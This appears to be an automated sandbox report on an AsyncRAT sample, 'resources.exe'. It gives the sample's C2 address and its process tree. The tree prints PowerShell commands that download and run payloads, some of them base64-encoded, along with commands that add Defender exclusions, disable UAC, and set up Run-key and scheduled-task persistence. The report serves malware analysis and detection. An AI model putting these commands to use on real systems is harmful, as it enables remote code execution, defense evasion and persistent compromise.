Analysis

  • max time kernel
    154s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/11/2023, 10:44

General

  • Target

    resources.exe

  • Size

    65KB

  • MD5

    693a87312aa1f6a31906187bda5293df

  • SHA1

    aaf236f3c5e791bd4f98d2c12758ff251c3b8474

  • SHA256

    f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

  • SHA512

    1c6e618ddb11d438286a032e6acd79fcb5fd89efa4fd2f3b1b4ae91785ac4a7ef8b894b910cd8394225118974e7a19aeb337313273cda2d2b0d9923cb3a212e2

  • SSDEEP

    1536:dfHn5T82s45tlDqwIdvKKBLutvfFoV/XUuL:dfH5TZsYnjIdbCNNoV/Xt

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WinDefault

C2

46.1.103.69:4263

Mutex

WinDefault

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

OperaCert

C2

46.1.103.69:7355

Mutex

OperaCert

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect ZGRat V1 31 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 14 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 16 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\resources.exe
    "C:\Users\Admin\AppData\Local\Temp\resources.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1496
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2168
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4436
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2512
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3532
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 2
        3⤵
        • Delays execution with timeout.exe
        PID:3872
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1952
      • C:\Users\Public\Music\RunNihaiersion.exe
        RunNihaiersion.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4632
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\SysWOW64\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 session
              6⤵
                PID:4596
            • C:\Users\Public\Music\israil.exe
              "C:\Users\Public\Music\israil.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:448
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:940
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4000
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3032
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1932
                • C:\Users\Admin\AppData\Local\Temp\xx.exe
                  xx.exe
                  7⤵
                  • Executes dropped EXE
                  PID:5012
                  • C:\Windows\system32\cmd.exe
                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
                    8⤵
                      PID:1612
                      • C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
                        C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        PID:2900
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"
                          10⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3784
                          • C:\Users\Admin\AppData\Roaming\2WinDefault.exe
                            "C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
                            11⤵
                            • Executes dropped EXE
                            PID:1380
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 804
                              12⤵
                              • Program crash
                              PID:1440
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
                      8⤵
                        PID:4384
                        • C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
                          C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
                          9⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:1304
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"
                            10⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4316
                            • C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
                              "C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
                              11⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4712
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                12⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1100
                      • C:\Windows\system32\cmd.exe
                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
                        8⤵
                          PID:112
                          • C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
                            C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:4252
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"
                              10⤵
                              • Blocklisted process makes network request
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1408
                              • C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
                                "C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
                                11⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4124
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  #cmd
                                  12⤵
                                    PID:5012
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    #cmd
                                    12⤵
                                    • Suspicious use of SetThreadContext
                                    PID:3312
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
                                      13⤵
                                        PID:3696
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                        13⤵
                                          PID:2800
                              • C:\Windows\system32\cmd.exe
                                "cmd" /C C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
                                8⤵
                                  PID:4288
                                  • C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
                                    C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
                                    9⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    PID:1564
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="
                                      10⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2204
                                      • C:\Users\Admin\AppData\Roaming\OperaCrt.exe
                                        "C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2128
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                          12⤵
                                            PID:2288
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                              13⤵
                                              • Creates scheduled task(s)
                                              PID:3100
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            #cmd
                                            12⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:448
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
                                            12⤵
                                            • Adds Run key to start application
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:684
                                  • C:\Windows\system32\cmd.exe
                                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
                                    8⤵
                                      PID:1100
                                      • C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
                                        C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
                                        9⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        PID:528
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="
                                          10⤵
                                          • Blocklisted process makes network request
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:656
                                          • C:\Users\Admin\AppData\Roaming\WiDefault.exe
                                            "C:\Users\Admin\AppData\Roaming\WiDefault.exe"
                                            11⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4004
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
                                              12⤵
                                              • Adds Run key to start application
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:528
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                              12⤵
                                                PID:3052
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                                  13⤵
                                                  • Creates scheduled task(s)
                                                  PID:1836
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                #cmd
                                                12⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2812
                                      • C:\Windows\system32\cmd.exe
                                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
                                        8⤵
                                          PID:380
                                          • C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
                                            C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
                                            9⤵
                                            • Drops startup file
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4104
                                        • C:\Windows\system32\cmd.exe
                                          "cmd" /C C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe
                                          8⤵
                                            PID:3048
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 8
                                  3⤵
                                  • Delays execution with timeout.exe
                                  PID:4988
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
                                  3⤵
                                  • Blocklisted process makes network request
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4104
                                • C:\Users\Public\Music\RunihaiVersion.exe
                                  RunihaiVersion.exe
                                  3⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4892
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4784
                                    • C:\Users\Public\Music\israil2.exe
                                      "C:\Users\Public\Music\israil2.exe"
                                      5⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      PID:4048
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
                                        6⤵
                                          PID:3696
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                            7⤵
                                            • UAC bypass
                                            • Modifies registry key
                                            PID:4864
                                      • C:\Windows\SysWOW64\net.exe
                                        net session
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2828
                              • C:\Windows\system32\OpenWith.exe
                                C:\Windows\system32\OpenWith.exe -Embedding
                                1⤵
                                • Modifies registry class
                                • Suspicious use of SetWindowsHookEx
                                PID:4108
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 session
                                1⤵
                                  PID:1304
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1380 -ip 1380
                                  1⤵
                                    PID:2168

                                  Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n4vdGlPOcH.exe.log

                                          Filesize

                                          226B

                                          MD5

                                          28d7fcc2b910da5e67ebb99451a5f598

                                          SHA1

                                          a5bf77a53eda1208f4f37d09d82da0b9915a6747

                                          SHA256

                                          2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

                                          SHA512

                                          2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                          Filesize

                                          3KB

                                          MD5

                                          556084f2c6d459c116a69d6fedcc4105

                                          SHA1

